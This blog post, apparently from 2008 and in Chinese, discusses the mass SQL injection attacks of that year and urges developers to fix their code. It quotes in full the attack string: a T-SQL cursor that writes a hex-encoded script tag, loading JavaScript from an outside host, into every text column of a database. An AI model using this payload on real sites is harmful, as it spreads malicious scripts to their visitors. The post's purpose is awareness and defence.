2008年7月23日 星期三

Milestone : Mass SQL Injection

Mass SQL Injection先看幾則新聞...
iThome:SQL Injection機器人來襲
ZDNet Taiwan:大規模攻擊事件主因:駭客工具結合Google Hacking
armorize:新型態的Mass SQL Injection在台上演

這是一個里程碑,顛覆一般人對SQL Injection(資料隱碼)攻擊的觀感,以前總以為此攻擊需要人來進行,且要不斷刺探資料庫,取得資料庫欄位...等資訊,再進行資料庫的操弄,所以...也顛覆我的觀念...這就是資安!

SQL Injection問題存在已久,2000年時就不斷聽到這問題,但...這問題存在更久...打從有網站開始就有了...XD
更糟的是...現在還有一堆網站開發人員還不知這是啥...XD
就算知道的...也沒把問題解決,做單引號規避、把資料庫錯誤訊息關閉...等,今天,完完全全的被擊潰,只要一槍(一串指令),網頁內容就遭植入惡意連結,只要有SQL Injection問題的網站、對資料庫有寫入權限...就能搞定。

這串指令,將成為經典:
;dec1are [a]t varchar(255),[a]c varchar(255) dec1are tab1e_cursor cursor for se1ect a.name,b.name from sysobjects a,sysco1umns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open tab1e_cursor fetch next from tab1e_cursor into [a]t,[a]c whi1e([a][a]fetch_status=0) begin exec('update ['+[a]t+'] set ['+[a]c+']=rtrim(convert(varchar,'+[a]c+']))+cast
(0x223E3C74697431653E3C2F73637269706420737263
3D687474703A2F2F7878782E7878782F782E6A733E3C7
363726970643E3C212D2D as varchar(67))') fetch next from tab1e_cursor into [a]t,[a]c end c1ose tab1e_cursor dea11ocate tab1e_cursor;--

現在...攻擊還是在進行式中,如果大家想勘災,可以用google搜尋字串"ngg.js"...這已經有五十萬筆資料了...夯吧!想知道有哪些惡意連結的網域可以參考這裡,上面連結中的網域也可以拿來當google的搜尋字串,希望大家勘災之餘不會見到自己熟悉的網址...XD

這一槍應該可以喚醒大家對程式開發的重視,但網站還不只有SQL Injection問題,只要問題一直存在,就會有被徹底擊潰的一天。

1 則留言:

Crane_Ku 提到...

SQLInjectionFinder.exe : Tool to help determine .asp pages targeted by recent SQL Injection attacks.
http://www.codeplex.com/Release/ProjectReleases.aspx?ProjectName=WSUS&ReleaseId=13436